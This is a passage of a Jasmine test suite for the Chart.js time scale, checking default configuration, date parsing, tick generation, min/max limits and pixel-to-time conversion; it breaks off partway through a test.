// Time scale tests
describe('Time scale tests', function() {
	function createScale(data, options) {
		var scaleID = 'myScale';
		var mockContext = window.createMockContext();
		var Constructor = Chart.scaleService.getScaleConstructor('time');
		var scale = new Constructor({
			ctx: mockContext,
			options: options,
			chart: {
				data: data
			},
			id: scaleID
		});

		scale.update(400, 50);
		return scale;
	}

	function getTicksLabels(scale) {
		return scale.ticks;
	}

	beforeEach(function() {
		// Need a time matcher for getValueFromPixel
		jasmine.addMatchers({
			toBeCloseToTime: function() {
				return {
					compare: function(actual, expected) {
						var result = false;

						var diff = actual.diff(expected.value, expected.unit, true);
						result = Math.abs(diff) < (expected.threshold !== undefined ? expected.threshold : 0.01);

						return {
							pass: result
						};
					}
				};
			}
		});
	});

	it('should load moment.js as a dependency', function() {
		expect(window.moment).not.toBe(undefined);
	});

	it('should register the constructor with the scale service', function() {
		var Constructor = Chart.scaleService.getScaleConstructor('time');
		expect(Constructor).not.toBe(undefined);
		expect(typeof Constructor).toBe('function');
	});

	it('should have the correct default config', function() {
		var defaultConfig = Chart.scaleService.getScaleDefaults('time');
		expect(defaultConfig).toEqual({
			display: true,
			gridLines: {
				color: 'rgba(0, 0, 0, 0.1)',
				drawBorder: true,
				drawOnChartArea: true,
				drawTicks: true,
				tickMarkLength: 10,
				lineWidth: 1,
				offsetGridLines: false,
				display: true,
				zeroLineColor: 'rgba(0,0,0,0.25)',
				zeroLineWidth: 1,
				zeroLineBorderDash: [],
				zeroLineBorderDashOffset: 0.0,
				borderDash: [],
				borderDashOffset: 0.0
			},
			position: 'bottom',
			offset: false,
			scaleLabel: Chart.defaults.scale.scaleLabel,
			bounds: 'data',
			distribution: 'linear',
			ticks: {
				beginAtZero: false,
				minRotation: 0,
				maxRotation: 50,
				mirror: false,
				source: 'auto',
				padding: 0,
				reverse: false,
				display: true,
				callback: defaultConfig.ticks.callback, // make this nicer, then check explicitly below,
				autoSkip: false,
				autoSkipPadding: 0,
				labelOffset: 0,
				minor: {},
				major: {
					enabled: false
				},
			},
			time: {
				parser: false,
				format: false,
				unit: false,
				round: false,
				isoWeekday: false,
				displayFormat: false,
				minUnit: 'millisecond',
				displayFormats: {
					millisecond: 'h:mm:ss.SSS a', // 11:20:01.123 AM
					second: 'h:mm:ss a', // 11:20:01 AM
					minute: 'h:mm a', // 11:20 AM
					hour: 'hA', // 5PM
					day: 'MMM D', // Sep 4
					week: 'll', // Week 46, or maybe "[W]WW - YYYY" ?
					month: 'MMM YYYY', // Sept 2015
					quarter: '[Q]Q - YYYY', // Q3
					year: 'YYYY' // 2015
				},
			}
		});

		// Is this actually a function
		expect(defaultConfig.ticks.callback).toEqual(jasmine.any(Function));
	});

	describe('when given inputs of different types', function() {
		// Helper to build date objects
		function newDateFromRef(days) {
			return moment('01/01/2015 12:00', 'DD/MM/YYYY HH:mm').add(days, 'd').toDate();
		}

		it('should accept labels as strings', function() {
			var mockData = {
				labels: ['2015-01-01T12:00:00', '2015-01-02T21:00:00', '2015-01-03T22:00:00', '2015-01-05T23:00:00', '2015-01-07T03:00', '2015-01-08T10:00', '2015-01-10T12:00'], // days
			};

			var scaleOptions = Chart.scaleService.getScaleDefaults('time');
			var scale = createScale(mockData, scaleOptions);
			scale.update(1000, 200);
			var ticks = getTicksLabels(scale);

			// `bounds === 'data'`: first and last ticks removed since outside the data range
			expect(ticks).toEqual(['Jan 2', 'Jan 3', 'Jan 4', 'Jan 5', 'Jan 6', 'Jan 7', 'Jan 8', 'Jan 9', 'Jan 10']);
		});

		it('should accept labels as date objects', function() {
			var mockData = {
				labels: [newDateFromRef(0), newDateFromRef(1), newDateFromRef(2), newDateFromRef(4), newDateFromRef(6), newDateFromRef(7), newDateFromRef(9)], // days
			};
			var scale = createScale(mockData, Chart.scaleService.getScaleDefaults('time'));
			scale.update(1000, 200);
			var ticks = getTicksLabels(scale);

			// `bounds === 'data'`: first and last ticks removed since outside the data range
			expect(ticks).toEqual(['Jan 2', 'Jan 3', 'Jan 4', 'Jan 5', 'Jan 6', 'Jan 7', 'Jan 8', 'Jan 9', 'Jan 10']);
		});

		it('should accept data as xy points', function() {
			var chart = window.acquireChart({
				type: 'line',
				data: {
					datasets: [{
						xAxisID: 'xScale0',
						data: [{
							x: newDateFromRef(0),
							y: 1
						}, {
							x: newDateFromRef(1),
							y: 10
						}, {
							x: newDateFromRef(2),
							y: 0
						}, {
							x: newDateFromRef(4),
							y: 5
						}, {
							x: newDateFromRef(6),
							y: 77
						}, {
							x: newDateFromRef(7),
							y: 9
						}, {
							x: newDateFromRef(9),
							y: 5
						}]
					}],
				},
				options: {
					scales: {
						xAxes: [{
							id: 'xScale0',
							type: 'time',
							position: 'bottom'
						}],
					}
				}
			});

			var xScale = chart.scales.xScale0;
			xScale.update(800, 200);
			var ticks = getTicksLabels(xScale);

			// `bounds === 'data'`: first and last ticks removed since outside the data range
			expect(ticks).toEqual(['Jan 2', 'Jan 3', 'Jan 4', 'Jan 5', 'Jan 6', 'Jan 7', 'Jan 8', 'Jan 9', 'Jan 10']);
		});

		it('should accept data as ty points', function() {
			var chart = window.acquireChart({
				type: 'line',
				data: {
					datasets: [{
						xAxisID: 'tScale0',
						data: [{
							t: newDateFromRef(0),
							y: 1
						}, {
							t: newDateFromRef(1),
							y: 10
						}, {
							t: newDateFromRef(2),
							y: 0
						}, {
							t: newDateFromRef(4),
							y: 5
						}, {
							t: newDateFromRef(6),
							y: 77
						}, {
							t: newDateFromRef(7),
							y: 9
						}, {
							t: newDateFromRef(9),
							y: 5
						}]
					}],
				},
				options: {
					scales: {
						xAxes: [{
							id: 'tScale0',
							type: 'time',
							position: 'bottom'
						}],
					}
				}
			});

			var tScale = chart.scales.tScale0;
			tScale.update(800, 200);
			var ticks = getTicksLabels(tScale);

			// `bounds === 'data'`: first and last ticks removed since outside the data range
			expect(ticks).toEqual(['Jan 2', 'Jan 3', 'Jan 4', 'Jan 5', 'Jan 6', 'Jan 7', 'Jan 8', 'Jan 9', 'Jan 10']);
		});
	});

	it('should allow custom time parsers', function() {
		var chart = window.acquireChart({
			type: 'line',
			data: {
				labels: ['foo', 'bar'],
				datasets: [{
					xAxisID: 'xScale0',
					data: [0, 1]
				}],
			},
			options: {
				scales: {
					xAxes: [{
						id: 'xScale0',
						type: 'time',
						position: 'bottom',
						time: {
							unit: 'day',
							round: true,
							parser: function(label) {
								return label === 'foo' ?
									moment('2000/01/02', 'YYYY/MM/DD') :
									moment('2016/05/08', 'YYYY/MM/DD');
							}
						},
						ticks: {
							source: 'labels'
						}
					}],
				}
			}
		});

		// Counts down because the lines are drawn top to bottom
		var xScale = chart.scales.xScale0;

		// Counts down because the lines are drawn top to bottom
		expect(xScale.ticks[0]).toBe('Jan 2');
		expect(xScale.ticks[1]).toBe('May 8');
	});

	it('should build ticks using the config unit', function() {
		var mockData = {
			labels: ['2015-01-01T20:00:00', '2015-01-02T21:00:00'], // days
		};

		var config = Chart.helpers.clone(Chart.scaleService.getScaleDefaults('time'));
		config.time.unit = 'hour';

		var scale = createScale(mockData, config);
		scale.update(2500, 200);
		var ticks = getTicksLabels(scale);

		expect(ticks).toEqual(['8PM', '9PM', '10PM', '11PM', '12AM', '1AM', '2AM', '3AM', '4AM', '5AM', '6AM', '7AM', '8AM', '9AM', '10AM', '11AM', '12PM', '1PM', '2PM', '3PM', '4PM', '5PM', '6PM', '7PM', '8PM', '9PM']);
	});

	it('build ticks honoring the minUnit', function() {
		var mockData = {
			labels: ['2015-01-01T20:00:00', '2015-01-02T21:00:00'], // days
		};

		var config = Chart.helpers.mergeIf({
			bounds: 'ticks',
			time: {
				minUnit: 'day'
			}
		}, Chart.scaleService.getScaleDefaults('time'));

		var scale = createScale(mockData, config);
		var ticks = getTicksLabels(scale);

		expect(ticks).toEqual(['Jan 1', 'Jan 2', 'Jan 3']);
	});

	it('should build ticks using the config diff', function() {
		var mockData = {
			labels: ['2015-01-01T20:00:00', '2015-02-02T21:00:00', '2015-02-21T01:00:00'], // days
		};

		var config = Chart.helpers.mergeIf({
			bounds: 'ticks',
			time: {
				unit: 'week',
				round: 'week'
			}
		}, Chart.scaleService.getScaleDefaults('time'));

		var scale = createScale(mockData, config);
		scale.update(800, 200);
		var ticks = getTicksLabels(scale);

		// last date is feb 15 because we round to start of week
		expect(ticks).toEqual(['Dec 28, 2014', 'Jan 4, 2015', 'Jan 11, 2015', 'Jan 18, 2015', 'Jan 25, 2015', 'Feb 1, 2015', 'Feb 8, 2015', 'Feb 15, 2015']);
	});

	describe('config step size', function() {
		it('should use the stepSize property', function() {
			var mockData = {
				labels: ['2015-01-01T20:00:00', '2015-01-01T21:00:00'],
			};

			var config = Chart.helpers.mergeIf({
				bounds: 'ticks',
				time: {
					unit: 'hour',
					stepSize: 2
				}
			}, Chart.scaleService.getScaleDefaults('time'));

			var scale = createScale(mockData, config);
			scale.update(2500, 200);
			var ticks = getTicksLabels(scale);

			expect(ticks).toEqual(['8PM', '10PM']);
		});
	});

	describe('when specifying limits', function() {
		var mockData = {
			labels: ['2015-01-01T20:00:00', '2015-01-02T20:00:00', '2015-01-03T20:00:00'],
		};

		var config;
		beforeEach(function() {
			config = Chart.helpers.clone(Chart.scaleService.getScaleDefaults('time'));
			config.ticks.source = 'labels';
			config.time.unit = 'day';
		});

		it('should use the min option when less than first label for building ticks', function() {
			config.time.min = '2014-12-29T04:00:00';

			var scale = createScale(mockData, config);
			expect(scale.ticks[0]).toEqual('Jan 1');
		});

		it('should use the min option when greater than first label for building ticks', function() {
			config.time.min = '2015-01-02T04:00:00';

			var scale = createScale(mockData, config);
			expect(scale.ticks[0]).toEqual('Jan 2');
		});

		it('should use the max option when greater than last label for building ticks', function() {
			config.time.max = '2015-01-05T06:00:00';

			var scale = createScale(mockData, config);
			expect(scale.ticks[scale.ticks.length - 1]).toEqual('Jan 3');
		});

		it('should use the max option when less than last label for building ticks', function() {
			config.time.max = '2015-01-02T23:00:00';

			var scale = createScale(mockData, config);
			expect(scale.ticks[scale.ticks.length - 1]).toEqual('Jan 2');
		});
	});

	it('should use the isoWeekday option', function() {
		var mockData = {
			labels: [
				'2015-01-01T20:00:00', // Thursday
				'2015-01-02T20:00:00', // Friday
				'2015-01-03T20:00:00' // Saturday
			]
		};

		var config = Chart.helpers.mergeIf({
			bounds: 'ticks',
			time: {
				unit: 'week',
				isoWeekday: 3 // Wednesday
			}
		}, Chart.scaleService.getScaleDefaults('time'));

		var scale = createScale(mockData, config);
		var ticks = getTicksLabels(scale);

		expect(ticks).toEqual(['Dec 31, 2014', 'Jan 7, 2015']);
	});

	describe('when rendering several days', function() {
		beforeEach(function() {
			this.chart = window.acquireChart({
				type: 'line',
				data: {
					datasets: [{
						xAxisID: 'xScale0',
						data: []
					}],
					labels: [
						'2015-01-01T20:00:00',
						'2015-01-02T21:00:00',
						'2015-01-03T22:00:00',
						'2015-01-05T23:00:00',
						'2015-01-07T03:00',
						'2015-01-08T10:00',
						'2015-01-10T12:00'
					]
				},
				options: {
					scales: {
						xAxes: [{
							id: 'xScale0',
							type: 'time',
							position: 'bottom'
						}],
					}
				}
			});

			this.scale = this.chart.scales.xScale0;
		});

		it('should be bounded by the nearest week beginnings', function() {
			var chart = this.chart;
			var scale = this.scale;
			expect(scale.getValueForPixel(scale.left)).toBeGreaterThan(moment(chart.data.labels[0]).startOf('week'));
			expect(scale.getValueForPixel(scale.right)).toBeLessThan(moment(chart.data.labels[chart.data.labels.length - 1]).add(1, 'week').endOf('week'));
		});

		it('should convert between screen coordinates and times', function() {
			var chart = this.chart;
			var scale = this.scale;
			var timeRange = moment(scale.max).valueOf() - moment(scale.min).valueOf();
			var msPerPix = timeRange / scale.width;
			var firstPointOffsetMs = moment(chart.config.data.labels[0]).valueOf() - scale.min;
			var firstPointPixel = scale.left + firstPointOffsetMs / msPerPix;
			var lastPointOffsetMs = moment(chart.config.data.labels[chart.config.data.labels.length - 1]).valueOf() - scale.min;
			var lastPointPixel = scale.left + lastPointOffsetMs / msPerPix;

			expect(scale.getPixelForValue('', 0, 0)).toBeCloseToPixel(firstPointPixel);
			expect(scale.getPixelForValue(chart.data.labels[0])).toBeCloseToPixel(firstPointPixel);
			expect(scale.getValueForPixel(firstPointPixel)).toBeCloseToTime({
				value: moment(chart.data.labels[0]),
				unit: 'hour',
			});

			expect(scale.getPixelForValue('', 6, 0)).toBeCloseToPixel(lastPointPixel);
			expect(scale.getValueForPixel(lastPointPixel)).toBeCloseToTime({
				value: moment(chart.data.labels[6]),
				unit: 'hour'
			});
		});
	});

	describe('when rendering several years', function() {
		beforeEach(function() {
			this.chart = window.acquireChart({
				type: 'line',
				data: {
					labels: ['2005-07-04', '2017-01-20'],
				},
				options: {
					scales: {
						xAxes: [{
							id: 'xScale0',
							type: 'time',
							bounds: 'ticks',
							position: 'bottom'
						}],
					}
				}
			});

			this.scale = this.chart.scales.xScale0;
			this.scale.update(800, 200);
		});

		it('should be bounded by nearest step\'s year start and end', function() {
			var scale = this.scale;
			var ticks = scale.getTicks();
			var step = ticks[1].value - ticks[0].value;
			var stepsAmount = Math.floor((scale.max - scale.min) / step);

			expect(scale.getValueForPixel(scale.left)).toBeCloseToTime({
				value: moment(scale.min).startOf('year'),
				unit: 'hour',
			});
			expect(scale.getValueForPixel(scale.right)).toBeCloseToTime({
				value: moment(scale.min + step * stepsAmount).endOf('year'),
				unit: 'hour',
			});
		});

		it('should build the correct ticks', function() {
			// Where 'correct' is a two year spacing.
			expect(getTicksLabels(this.scale)).toEqual(['2005', '2007', '2009', '2011', '2013', '2015', '2017', '2019']);
		});

		it('should have ticks with accurate labels', function() {
			var scale = this.scale;
			var ticks = scale.getTicks();
			var pixelsPerYear = scale.width / 14;

			for (var i = 0; i < ticks.length - 1; i++) {
				var offset = 2 * pixelsPerYear * i;
				expect(scale.getValueForPixel(scale.left + offset)).toBeCloseToTime({
					value: moment(ticks[i].label + '-01-01'),
					unit: 'day',
					threshold: 0.5,
				});
			}
		});
	});

	it('should get the correct label for a data value', function() {
		var chart = window.acquireChart({
			type: 'line',
			data: {
				datasets: [{
					xAxisID: 'xScale0',
					data: [null, 10, 3]
				}],
				labels: ['2015-01-01T20:00:00', '2015-01-02T21:00:00', '2015-01-03T22:00:00', '2015-01-05T23:00:00', '2015-01-07T03:00', '2015-01-08T10:00', '2015-01-10T12:00'], // days
			},
			options: {
				scales: {
					xAxes: [{
						id: 'xScale0',
						type: 'time',
						position: 'bottom'
					}],
				}
			}
		});

		var xScale = chart.scales.xScale0;
		expect(xScale.getLabelForIndex(0, 0)).toBeTruthy();
		expect(xScale.getLabelForIndex(0, 0)).toBe('2015-01-01T20:00:00');
		expect(xScale.getLabelForIndex(6, 0)).toBe('2015-01-10T12:00');
	});

	it('should get the correct label when time is specified as a string', function() {
		var chart = window.acquireChart({
			type: 'line',
			data: {
				datasets: [{
					xAxisID: 'xScale0',
					data: [{t: '2015-01-01T20:00:00', y: 10}, {t: '2015-01-02T21:00:00', y: 3}]
				}],
			},
			options: {
				scales: {
					xAxes: [{
						id: 'xScale0',
						type: 'time',
						position: 'bottom'
					}],
				}
			}
		});

		var xScale = chart.scales.xScale0;
		expect(xScale.getLabelForIndex(0, 0)).toBeTruthy();
		expect(xScale.getLabelForIndex(0, 0)).toBe('2015-01-01T20:00:00');
	});

	it('should get the correct label for a timestamp with milliseconds', function() {
		var chart = window.acquireChart({
			type: 'line',
			data: {
				datasets: [{
					xAxisID: 'xScale0',
					data: [
						{t: +new Date('2018-01-08 05:14:23.234'), y: 10},
						{t: +new Date('2018-01-09 06:17:43.426'), y: 3}
					]
				}],
			},
			options: {
				scales: {
					xAxes: [{
						id: 'xScale0',
						type: 'time',
						position: 'bottom'
					}],
				}
			}
		});

		var xScale = chart.scales.xScale0;
		var label = xScale.getLabelForIndex(0, 0);
		expect(label).toEqual('Jan 8, 2018 5:14:23.234 am');
	});

	it('should get the correct label for a timestamp with time', function() {
		var chart = window.acquireChart({
			type: 'line',
			data: {
				datasets: [{
					xAxisID: 'xScale0',
					data: [
						{t: +new Date('2018-01-08 05:14:23'), y: 10},
						{t: +new Date('2018-01-09 06:17:43'), y: 3}
					]
				}],
			},
			options: {
				scales: {
					xAxes: [{
						id: 'xScale0',
						type: 'time',
						position: 'bottom'
					}],
				}
			}
		});

		var xScale = chart.scales.xScale0;
		var label = xScale.getLabelForIndex(0, 0);
		expect(label).toEqual('Jan 8, 2018 5:14:23 am');
	});

	it('should get the correct label for a timestamp representing a date', function() {
		var chart = window.acquireChart({
			type: 'line',
			data: {
				datasets: [{
					xAxisID: 'xScale0',
					data: [
						{t: +new Date('2018-01-08 00:00:00'), y: 10},
						{t: +new Date('2018-01-09 00:00:00'), y: 3}
					]
				}],
			},
			options: {
				scales: {
					xAxes: [{
						id: 'xScale0',
						type: 'time',
						position: 'bottom'
					}],
				}
			}
		});

		var xScale = chart.scales.xScale0;
		var label = xScale.getLabelForIndex(0, 0);
		expect(label).toEqual('Jan 8, 2018');
	});

	it('should get the correct pixel for only one data in the dataset', function() {
		var chart = window.acquireChart({
			type: 'line',
			data: {
				labels: ['2016-05-27'],
				datasets: [{
					xAxisID: 'xScale0',
					data: [5]
				}]
			},
			options: {
				scales: {
					xAxes: [{
						id: 'xScale0',
						display: true,
						type: 'time'
					}]
				}
			}
		});

		var xScale = chart.scales.xScale0;
		var pixel = xScale.getPixelForValue('', 0, 0);

		expect(xScale.getValueForPixel(pixel).valueOf()).toEqual(moment(chart.data.labels[0]).valueOf());
	});

	it('does not create a negative width chart when hidden', function() {
		var chart = window.acquireChart({
			type: 'line',
			data: {
				datasets: [{
					data: []
				}]
			},
			options: {
				scales: {
					xAxes: [{
						type: 'time',
						time: {
							min: moment().subtract(1, 'months'),
							max: moment(),
						}
					}],
				},
				responsive: true,
			},
		}, {
			wrapper: {
				style: 'display: none',
			},
		});
		expect(chart.scales['y-axis-0'].width).toEqual(0);
		expect(chart.scales['y-axis-0'].maxWidth).toEqual(0);
		expect(chart.width).toEqual(0);
	});

	describe('when ticks.source', function() {
		describe('is "labels"', function() {
			beforeEach(function() {
				this.chart = window.acquireChart({
					type: 'line',
					data: {
						labels: ['2017', '2019', '2020', '2025', '2042'],
						datasets: [{data: [0, 1, 2, 3, 4, 5]}]
					},
					options: {
						scales: {
							xAxes: [{
								id: 'x',
								type: 'time',
								time: {
									parser: 'YYYY'
								},
								ticks: {
									source: 'labels'
								}
							}]
						}
					}
				});
			});

			it ('should generate ticks from "data.labels"', function() {
				var scale = this.chart.scales.x;

				expect(scale.min).toEqual(+moment('2017', 'YYYY'));
				expect(scale.max).toEqual(+moment('2042', 'YYYY'));
				expect(getTicksLabels(scale)).toEqual([
					'2017', '2019', '2020', '2025', '2042']);
			});
			it ('should not add ticks for min and max if they extend the labels range', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.min = '2012';
				options.time.max = '2051';
				chart.update();

				expect(scale.min).toEqual(+moment('2012', 'YYYY'));
				expect(scale.max).toEqual(+moment('2051', 'YYYY'));
				expect(getTicksLabels(scale)).toEqual([
					'2017', '2019', '2020', '2025', '2042']);
			});
			it ('should not duplicate ticks if min and max are the labels limits', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.min = '2017';
				options.time.max = '2042';
				chart.update();

				expect(scale.min).toEqual(+moment('2017', 'YYYY'));
				expect(scale.max).toEqual(+moment('2042', 'YYYY'));
				expect(getTicksLabels(scale)).toEqual([
					'2017', '2019', '2020', '2025', '2042']);
			});
			it ('should correctly handle empty `data.labels` using "day" if `time.unit` is undefined`', function() {
				var chart = this.chart;
				var scale = chart.scales.x;

				chart.data.labels = [];
				chart.update();

				expect(scale.min).toEqual(+moment().startOf('day'));
				expect(scale.max).toEqual(+moment().endOf('day') + 1);
				expect(getTicksLabels(scale)).toEqual([]);
			});
			it ('should correctly handle empty `data.labels` using `time.unit`', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.unit = 'year';
				chart.data.labels = [];
				chart.update();

				expect(scale.min).toEqual(+moment().startOf('year'));
				expect(scale.max).toEqual(+moment().endOf('year') + 1);
				expect(getTicksLabels(scale)).toEqual([]);
			});
		});

		describe('is "data"', function() {
			beforeEach(function() {
				this.chart = window.acquireChart({
					type: 'line',
					data: {
						labels: ['2017', '2019', '2020', '2025', '2042'],
						datasets: [
							{data: [0, 1, 2, 3, 4, 5]},
							{data: [
								{t: '2018', y: 6},
								{t: '2020', y: 7},
								{t: '2043', y: 8}
							]}
						]
					},
					options: {
						scales: {
							xAxes: [{
								id: 'x',
								type: 'time',
								time: {
									parser: 'YYYY'
								},
								ticks: {
									source: 'data'
								}
							}]
						}
					}
				});
			});

			it ('should generate ticks from "datasets.data"', function() {
				var scale = this.chart.scales.x;

				expect(scale.min).toEqual(+moment('2017', 'YYYY'));
				expect(scale.max).toEqual(+moment('2043', 'YYYY'));
				expect(getTicksLabels(scale)).toEqual([
					'2017', '2018', '2019', '2020', '2025', '2042', '2043']);
			});
			it ('should not add ticks for min and max if they extend the labels range', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.min = '2012';
				options.time.max = '2051';
				chart.update();

				expect(scale.min).toEqual(+moment('2012', 'YYYY'));
				expect(scale.max).toEqual(+moment('2051', 'YYYY'));
				expect(getTicksLabels(scale)).toEqual([
					'2017', '2018', '2019', '2020', '2025', '2042', '2043']);
			});
			it ('should not duplicate ticks if min and max are the labels limits', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.min = '2017';
				options.time.max = '2043';
				chart.update();

				expect(scale.min).toEqual(+moment('2017', 'YYYY'));
				expect(scale.max).toEqual(+moment('2043', 'YYYY'));
				expect(getTicksLabels(scale)).toEqual([
					'2017', '2018', '2019', '2020', '2025', '2042', '2043']);
			});
			it ('should correctly handle empty `data.labels` using "day" if `time.unit` is undefined`', function() {
				var chart = this.chart;
				var scale = chart.scales.x;

				chart.data.labels = [];
				chart.update();

				expect(scale.min).toEqual(+moment('2018', 'YYYY'));
				expect(scale.max).toEqual(+moment('2043', 'YYYY'));
				expect(getTicksLabels(scale)).toEqual([
					'2018', '2020', '2043']);
			});
			it ('should correctly handle empty `data.labels` and hidden datasets using `time.unit`', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.unit = 'year';
				chart.data.labels = [];
				var meta = chart.getDatasetMeta(1);
				meta.hidden = true;
				chart.update();

				expect(scale.min).toEqual(+moment().startOf('year'));
				expect(scale.max).toEqual(+moment().endOf('year') + 1);
				expect(getTicksLabels(scale)).toEqual([]);
			});
		});
	});

	describe('when distribution', function() {
		describe('is "series"', function() {
			beforeEach(function() {
				this.chart = window.acquireChart({
					type: 'line',
					data: {
						labels: ['2017', '2019', '2020', '2025', '2042'],
						datasets: [{data: [0, 1, 2, 3, 4, 5]}]
					},
					options: {
						scales: {
							xAxes: [{
								id: 'x',
								type: 'time',
								time: {
									parser: 'YYYY'
								},
								distribution: 'series',
								ticks: {
									source: 'labels'
								}
							}],
							yAxes: [{
								display: false
							}]
						}
					}
				});
			});

			it ('should space data out with the same gap, whatever their time values', function() {
				var scale = this.chart.scales.x;
				var start = scale.left;
				var slice = scale.width / 4;

				expect(scale.getPixelForValue('2017')).toBeCloseToPixel(start);
				expect(scale.getPixelForValue('2019')).toBeCloseToPixel(start + slice);
				expect(scale.getPixelForValue('2020')).toBeCloseToPixel(start + slice * 2);
				expect(scale.getPixelForValue('2025')).toBeCloseToPixel(start + slice * 3);
				expect(scale.getPixelForValue('2042')).toBeCloseToPixel(start + slice * 4);
			});
			it ('should add a step before if scale.min is before the first data', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.min = '2012';
				chart.update();

				var start = scale.left;
				var slice = scale.width / 5;

				expect(scale.getPixelForValue('2017')).toBeCloseToPixel(start + slice);
				expect(scale.getPixelForValue('2042')).toBeCloseToPixel(start + slice * 5);
			});
			it ('should add a step after if scale.max is after the last data', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.max = '2050';
				chart.update();

				var start = scale.left;
				var slice = scale.width / 5;

				expect(scale.getPixelForValue('2017')).toBeCloseToPixel(start);
				expect(scale.getPixelForValue('2042')).toBeCloseToPixel(start + slice * 4);
			});
			it ('should add steps before and after if scale.min/max are outside the data range', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.min = '2012';
				options.time.max = '2050';
				chart.update();

				var start = scale.left;
				var slice = scale.width / 6;

				expect(scale.getPixelForValue('2017')).toBeCloseToPixel(start + slice);
				expect(scale.getPixelForValue('2042')).toBeCloseToPixel(start + slice * 5);
			});
		});
		describe('is "linear"', function() {
			beforeEach(function() {
				this.chart = window.acquireChart({
					type: 'line',
					data: {
						labels: ['2017', '2019', '2020', '2025', '2042'],
						datasets: [{data: [0, 1, 2, 3, 4, 5]}]
					},
					options: {
						scales: {
							xAxes: [{
								id: 'x',
								type: 'time',
								time: {
									parser: 'YYYY'
								},
								distribution: 'linear',
								ticks: {
									source: 'labels'
								}
							}],
							yAxes: [{
								display: false
							}]
						}
					}
				});
			});

			it ('should space data out with a gap relative to their time values', function() {
				var scale = this.chart.scales.x;
				var start = scale.left;
				var slice = scale.width / (2042 - 2017);

				expect(scale.getPixelForValue('2017')).toBeCloseToPixel(start);
				expect(scale.getPixelForValue('2019')).toBeCloseToPixel(start + slice * (2019 - 2017));
				expect(scale.getPixelForValue('2020')).toBeCloseToPixel(start + slice * (2020 - 2017));
				expect(scale.getPixelForValue('2025')).toBeCloseToPixel(start + slice * (2025 - 2017));
				expect(scale.getPixelForValue('2042')).toBeCloseToPixel(start + slice * (2042 - 2017));
			});
			it ('should take in account scale min and max if outside the ticks range', function() {
				var chart = this.chart;
				var scale = chart.scales.x;
				var options = chart.options.scales.xAxes[0];

				options.time.min = '2012';
				options.time.max = '2050';
				chart.update();

				var start = scale.left;
				var slice = scale.width / (2050 - 2012);

				expect(scale.getPixelForValue('2017')).toBeCloseToPixel(start + slice * (2017 - 2012));
				expect(scale.getPixelForValue('2019')).toBeCloseToPixel(start + slice * (2019 - 2012));
				expect(scale.getPixelForValue('2020')).toBeCloseToPixel(start + slice * (2020 - 2012));
				expect(scale.getPixelForValue('2025')).toBeCloseToPixel(start + slice * (2025 - 2012));
				expect(scale.getPixelForValue('2042')).toBeCloseToPixel(start + slice * (2042 - 2012));
			});
		});
	});

	describe('when bounds', function() {
		describe('is "data"', function() {
			it ('should preserve the data range', function() {
				var chart = window.acquireChart({
					type: 'line',
					data: {
						labels: ['02/20 08:00', '02/21 09:00', '02/22 10:00', '02/23 11:00'],
						datasets: [{data: [0, 1, 2, 3, 4, 5]}]
					},
					options: {
						scales: {
							xAxes: [{
								id: 'x',
								type: 'time',
								bounds: 'data',
								time: {
									parser: 'MM/DD HH:mm',
									unit: 'day'
								}
							}],
							yAxes: [{
								display: false
							}]
						}
					}
				});

				var scale = chart.scales.x;

				expect(scale.min).toEqual(+moment('02/20 08:00', 'MM/DD HH:mm'));
				expect(scale.max).toEqual(+moment('02/23 11:00', 'MM/DD HH:mm'));
				expect(scale.getPixelForValue('02/20 08:00')).toBeCloseToPixel(scale.left);
				expect(scale.getPixelForValue('02/23 11:00')).toBeCloseToPixel(scale.left + scale.width);
				expect(getTicksLabels(scale)).toEqual([
					'Feb 21', 'Feb 22', 'Feb 23']);
			});
		});

		describe('is "labels"', function() {
			it('should preserve the label range', function() {
				var chart = window.acquireChart({
					type: 'line',
					data: {
						labels: ['02/20 08:00', '02/21 09:00', '02/22 10:00', '02/23 11:00'],
						datasets: [{data: [0, 1, 2, 3, 4, 5]}]
					},
					options: {
						scales: {
							xAxes: [{
								id: 'x',
								type: 'time',
								bounds: 'ticks',
								time: {
									parser: 'MM/DD HH:mm',
									unit: 'day'
								}
							}],
							yAxes: [{
								display: false
							}]
						}
					}
				});

				var scale = chart.scales.x;
				var ticks = scale.getTicks();

				expect(scale.min).toEqual(ticks[0].value);
				expect(scale.max).toEqual(ticks[ticks.length - 1].value);
				expect(scale.getPixelForValue('02/20 08:00')).toBeCloseToPixel(60);
				expect(scale.getPixelForValue('02/23 11:00')).toBeCloseToPixel(426);
				expect(getTicksLabels(scale)).toEqual([
					'Feb 20', 'Feb 21', 'Feb 22', 'Feb 23', 'Feb 24']);
			});
		});
	});

	describe('when time.min and/or time.max are defined', function() {
		['auto', 'data', 'labels'].forEach(function(source) {
			['data', 'ticks'].forEach(function(bounds) {
				describe('and ticks.source is "' + source + '" and bounds "' + bounds + '"', function() {
					beforeEach(function() {
						this.chart = window.acquireChart({
							type: 'line',
							data: {
								labels: ['02/20 08:00', '02/21 09:00', '02/22 10:00', '02/23 11:00'],
								datasets: [{data: [0, 1, 2, 3, 4, 5]}]
							},
							options: {
								scales: {
									xAxes: [{
										id: 'x',
										type: 'time',
										bounds: bounds,
										time: {
											parser: 'MM/DD HH:mm',
											unit: 'day'
										},
										ticks: {
											source: source
										}
									}],
									yAxes: [{
										display: false
									}]
								}
							}
						});
					});

					it ('should expand scale to the min/max range', function() {
						var chart = this.chart;
						var scale = chart.scales.x;
						var options = chart.options.scales.xAxes[0];
						var min = '02/19 07:00';
						var max = '02/24 08:00';

						options.time.min = min;
						options.time.max = max;
						chart.update();

						expect(scale.min).toEqual(+moment(min, 'MM/DD HH:mm'));
						expect(scale.max).toEqual(+moment(max, 'MM/DD HH:mm'));
